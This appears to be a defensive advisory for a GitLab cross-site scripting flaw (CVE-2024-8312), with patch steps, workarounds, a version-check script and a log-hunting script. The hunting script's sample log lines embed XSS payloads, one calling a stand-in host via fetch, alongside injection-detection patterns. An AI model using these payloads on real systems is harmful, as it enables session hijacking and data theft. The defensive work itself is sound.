CVE-2024-8312
📋 TL;DR
This vulnerability allows an attacker to inject HTML into GitLab's Global Search field as it is rendered on diff views, resulting in cross-site scripting (XSS) in the browser of any user who opens a crafted diff-view link. Affected are GitLab CE and EE instances running versions before 17.3.6, 17.4.3 and 17.5.1 (and anything older than the 17.3 series, which has no fixed release). The injected script runs in the victim's authenticated session and can act on their behalf.
💻 Affected Systems
- GitLab Community Edition
- GitLab Enterprise Edition
📦 What is this software?
GitLab by GitLab
GitLab is a complete DevOps platform providing source code management, CI/CD pipelines, security scanning, container registry, and collaboration tools used by millions of developers and thousands of enterprises worldwide. As both a cloud-hosted SaaS offering (GitLab.com) and self-managed software, G...
⚠️ Risk & Real-World Impact
Worst Case
The injected script runs with the victim's session. GitLab's session cookie is HttpOnly, so the script usually cannot read it directly, but it can issue authenticated requests as the victim: create personal access tokens, add SSH keys, change project or group settings, or redirect the user to an attacker-controlled site. Against an administrator this chains into full instance takeover.
Likely Case
Token or key creation in the victim's account (persistent access after the page is closed), defacement or spoofing of the GitLab interface to phish credentials, or exfiltration of source, issue and merge request data visible to the victim's session.
If Mitigated
With a strict Content Security Policy in place (GitLab ships a nonce-based policy by default, so a working payload also needs a way around it), impact shrinks to HTML injection within the vulnerable page: fake notices or forms aimed at the user rather than script execution in the session.
🎯 Exploit Status
Exploitation requires user interaction: a victim must open an attacker-supplied link to a diff view on a vulnerable instance. Once the injection point is known the payload is an ordinary reflected-XSS string, so the bar for an attacker is low.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 17.3.6, 17.4.3, or 17.5.1
Vendor Advisory: https://gitlab.com/gitlab-org/gitlab/-/issues/481819
Restart Required: Yes (on Omnibus packages the upgrade runs gitlab-ctl reconfigure and restarts services for you)
Instructions:
1. Back up the instance (sudo gitlab-backup create on Omnibus) and the configuration in /etc/gitlab.
2. Upgrade to 17.3.6, 17.4.3 or 17.5.1, whichever matches your minor series, using your package manager. If you are more than one minor version behind, follow GitLab's supported upgrade path rather than jumping straight to the fixed release.
3. Restart GitLab services if the upgrade did not already do so (sudo gitlab-ctl restart).
4. Verify the upgrade completed and the new version is reported (sudo gitlab-rake gitlab:env:info).
🔧 Temporary Workarounds
Disable Global Search
Temporarily disable the Global Search feature to reduce exposure. Caveat: the attribute name in the command below is as given on this page and is not a documented application setting; recent releases expose per-scope switches such as global_search_issues_enabled rather than one global flag. Check first with gitlab-rails runner "puts ApplicationSetting.column_names.grep(/search/)". If the attribute does not exist, update! raises ActiveModel::UnknownAttributeError and nothing is changed. Because the flaw is in how the search field itself is rendered, turning off search scopes does not guarantee the field disappears from diff views; treat this as a partial measure.
gitlab-rails runner "ApplicationSetting.current.update!(global_search_enabled: false)"
Implement Content Security Policy
A strict CSP limits what an injected payload can do. Do not use the header below as written: with 'unsafe-inline' and 'unsafe-eval' in script-src it provides no XSS mitigation at all, and a second Content-Security-Policy header added at the nginx/Apache layer is enforced alongside GitLab's own nonce-based policy, which is likely to break the UI. On Omnibus, adjust GitLab's policy in /etc/gitlab/gitlab.rb under gitlab_rails['content_security_policy'] (enabled, report_only, and a directives hash; see the Omnibus "Set a Content Security Policy" documentation) and run gitlab-ctl reconfigure. Roll the change out in report-only mode first and review violation reports before enforcing. For the record, this is the header the page originally proposed; it should not be deployed as-is:
add_header Content-Security-Policy "default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data:;";
🧯 If You Can't Patch
- Restrict network access to GitLab to trusted IPs with firewall rules. This shrinks who can reach the injection point, but it does not protect against a malicious or compromised insider, and the victim's browser still carries the payload in from wherever the link was delivered.
- Add web application firewall (WAF) rules that block HTML/JavaScript patterns (tags, javascript: URLs, on*= handlers) in the search parameters of /search and diff-view requests. Decode percent-encoding, including double encoding, before matching, and expect bypasses; this buys time, it does not close the hole.
🔍 How to Verify
Check if Vulnerable:
Read the installed version and compare it with the fixed release for its minor series. On Omnibus:
sudo gitlab-rake gitlab:env:info | grep -E '^Version:'
(the "GitLab information" block prints the version on a line beginning with "Version:"; the string "GitLab version" does not occur in the output), or read it from the package directly:
sudo cat /opt/gitlab/embedded/service/gitlab-rails/VERSION
Remotely, with an API token: curl --header "PRIVATE-TOKEN: <token>" https://gitlab.example.com/api/v4/version
Verify Fix Applied:
Confirm the version is 17.3.6 or later within 17.3, 17.4.3 or later within 17.4, or 17.5.1 or later (17.5 and every newer series). Instances on 17.2 or earlier have no fixed release and must be upgraded. Optionally, on a staging copy, submit a harmless marker containing an HTML tag (a bare <b> tag is enough) through the Global Search field on a diff view and confirm it is rendered as literal text rather than markup.
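The version comparison above is easy to get wrong by hand (17.4.2 is vulnerable although it is numerically "newer" than 17.3.6). The following script, added here as an example and not a GitLab tool, applies the rule this advisory implies: a release is fixed if it is at or above the fix version of its own minor series or in any newer series, and anything older than the 17.3 series is treated as affected. The env-info text it parses is a constructed sample in the format gitlab-rake gitlab:env:info prints; the subprocess call at the bottom is only attempted when run as a script on a host that has gitlab-rake.

```python
"""Decide whether an installed GitLab version is fixed for CVE-2024-8312.

Fixed versions are the ones listed on this page. The "newer series is fixed,
older series is affected" rule is an assumption consistent with that list.
"""
import re
import subprocess
from typing import Tuple

FIXED_VERSIONS = ("17.3.6", "17.4.3", "17.5.1")
Version = Tuple[int, int, int]

# Constructed sample of `gitlab-rake gitlab:env:info` output (not real host data).
SAMPLE_ENV_INFO = """System information
System:\t\tUbuntu 22.04
Current User:\tgit
Ruby Version:\t3.2.5
Go Version:\tunknown

GitLab information
Version:\t17.4.2-ee
Revision:\tabc123def
Directory:\t/opt/gitlab/embedded/service/gitlab-rails
"""


def parse_version(text: str) -> Version:
    """Extract MAJOR.MINOR.PATCH from '17.4.2', '17.4.2-ee' or 'Version:\t17.4.2-ee'."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no version number in {text!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def installed_version_from_env_info(output: str) -> str:
    """Return the value of the 'Version:' line from the GitLab information block.

    Only the GitLab block has a line starting exactly with 'Version:'; the
    System block uses 'Ruby Version:', 'Go Version:' and so on.
    """
    for line in output.splitlines():
        if line.startswith("Version:"):
            return line.split(":", 1)[1].strip()
    raise ValueError("no 'Version:' line found in env:info output")


def is_fixed(installed: str, fixed: Tuple[str, ...] = FIXED_VERSIONS) -> bool:
    """True if `installed` contains the fix for CVE-2024-8312."""
    v = parse_version(installed)
    fixes = sorted(parse_version(f) for f in fixed)
    if v[:2] < fixes[0][:2]:
        return False            # series older than every fixed series: no fix exists
    for f in fixes:
        if v[:2] == f[:2]:
            return v >= f       # same minor series: compare the patch level
    return v[:2] > fixes[-1][:2]  # a series newer than the last fix shipped after it


def assess(installed: str) -> str:
    """Human-readable verdict for a version string."""
    state = "FIXED" if is_fixed(installed) else "VULNERABLE"
    return f"GitLab {installed}: {state} for CVE-2024-8312"


if __name__ == "__main__":
    print(assess(installed_version_from_env_info(SAMPLE_ENV_INFO)))
    try:  # live check; only works on an Omnibus host with gitlab-rake installed
        out = subprocess.run(["gitlab-rake", "gitlab:env:info"],
                             capture_output=True, text=True, check=True).stdout
        print(assess(installed_version_from_env_info(out)))
    except (FileNotFoundError, subprocess.CalledProcessError):
        pass
```

The conservative branch matters: a series that is not in the fixed list and sits between two listed ones (none exist for this CVE, but the pattern recurs in other advisories) is reported as not fixed rather than silently assumed safe.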
📡 Detection & Monitoring
Log Indicators:
- Requests to /search or diff-view paths whose query string, once URL-decoded, contains HTML tags, javascript: URLs or on*= event handlers (check the nginx gitlab_access.log; payloads arrive percent-encoded and are often double-encoded)
- Requests from the same session to sensitive endpoints (personal access token creation, SSH key addition, runner registration, member changes) shortly after such a request, which is what a payload acting as the victim would do
Network Indicators:
- HTTP requests to diff views (/-/merge_requests/N/diffs, /-/commit/SHA/diffs) with encoded HTML in query parameters
- From user workstations, outbound connections to unfamiliar domains immediately after loading a GitLab diff view, consistent with a payload exfiltrating data from the victim's session
SIEM Query (pseudo-syntax; adapt to your platform and decode the query string before matching, since an exact match on a raw "<script>" will miss encoded payloads):
source="gitlab_access.log" AND (uri_path="/search" OR uri_path="*/diffs") AND (query="*<script*" OR query="*javascript:*" OR query="*onerror=*" OR query="*onload=*" OR query="*<svg*" OR query="*<img*")
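Here is the same hunt as a runnable script, added as an example for this page (not a GitLab or vendor tool). It assumes the nginx "combined" format that the Omnibus gitlab_access.log uses, decodes parameter values repeatedly so double-encoded payloads are caught, and only flags requests to the global search path or diff-view paths. The log lines are constructed for the example; the search query parameter name on the diff-view line is illustrative.

```python
"""Hunt GitLab nginx access logs for HTML/JS injection in search or diff-view
query parameters (CVE-2024-8312). Sample lines below are constructed."""
import re
from typing import Dict, List
from urllib.parse import parse_qsl, unquote, urlsplit

# nginx 'combined' prefix: ip - user [time] "METHOD target HTTP/x" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# Pages that reflect a search term: global search and MR/commit diff views.
PATH_RE = re.compile(r"^/search$|/-/merge_requests/\d+/diffs$|/-/commit/[0-9a-f]+/diffs$")
# Payload markers, applied to the fully decoded value. '</?[a-z!]' requires a tag
# name right after '<', so an ordinary search for "a < b" is not flagged.
PAYLOAD_RE = re.compile(
    r"</?[a-z!]|javascript\s*:|\bon[a-z]+\s*=|&#x?[0-9a-f]+;|srcdoc\s*=",
    re.IGNORECASE,
)

SAMPLE_LOG = """\
203.0.113.5 - - [23/Oct/2024:10:00:01 +0000] "GET /search?search=%3Cimg+src%3Dx+onerror%3Dalert(document.cookie)%3E&scope=blobs HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [23/Oct/2024:10:00:07 +0000] "GET /grp/app/-/merge_requests/42/diffs?search=%253Csvg%2Fonload%253Dfetch('https://evil.example/c')%253E HTTP/1.1" 200 8800 "-" "Mozilla/5.0"
198.51.100.9 - alice [23/Oct/2024:10:01:12 +0000] "GET /search?search=ConfigMap+a+%3C+b&scope=blobs HTTP/1.1" 200 4400 "-" "Mozilla/5.0"
198.51.100.9 - alice [23/Oct/2024:10:02:00 +0000] "GET /grp/app/-/merge_requests/42/diffs?view=inline HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""


def deep_unquote(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding; attackers double-encode to slip past filters."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(target: str) -> Dict[str, str]:
    """Return {param: decoded value} for injection-like values on a watched path."""
    parts = urlsplit(target)
    if not PATH_RE.search(parts.path):
        return {}
    hits: Dict[str, str] = {}
    for key, raw in parse_qsl(parts.query, keep_blank_values=True):  # decodes one layer
        decoded = deep_unquote(raw)                                  # then any extra layers
        if PAYLOAD_RE.search(decoded):
            hits[key] = decoded
    return hits


def scan(lines: List[str]) -> List[dict]:
    """Parse log lines and return one finding per request carrying a payload."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = suspicious_params(m["target"])
        if hits:
            findings.append({
                "ip": m["ip"], "user": m["user"], "ts": m["ts"],
                "path": urlsplit(m["target"]).path,
                "status": int(m["status"]), "params": hits,
            })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"{f['ts']} {f['ip']} {f['path']} -> {f['params']}")
```

The second sample line is double-encoded (%253C rather than %3C), which a plain substring match on the raw log misses; the decoding loop recovers the <svg/onload=...> payload. Expect some false positives on code search terms that legitimately contain angle brackets and event-handler names; tune PAYLOAD_RE against your own traffic and pivot from any hit to the same session's subsequent requests.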